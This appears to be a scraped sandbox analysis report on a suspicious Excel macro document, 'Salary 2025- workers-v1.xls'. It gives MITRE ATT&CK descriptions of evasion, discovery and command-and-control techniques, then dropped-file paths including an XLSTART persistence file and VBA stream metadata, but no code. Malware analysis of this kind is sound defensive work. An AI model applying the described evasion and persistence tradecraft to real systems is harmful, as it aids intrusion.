Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Salary 2025- workers-v1.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF7F1A492639213F2D.TMP

C:\Users\user\AppData\Local\Temp\~DFD4A5D58B07B985D6.TMP

C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\mypersonnel.xls

C:\Users\user\Documents\~$mypersonnel.xls

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Salary 2025- workers-v1.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Kangatang, Stream Size: 2955

General

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 236

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 109758

General

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 309

General

Windows Analysis Report
Salary 2025- workers-v1.xls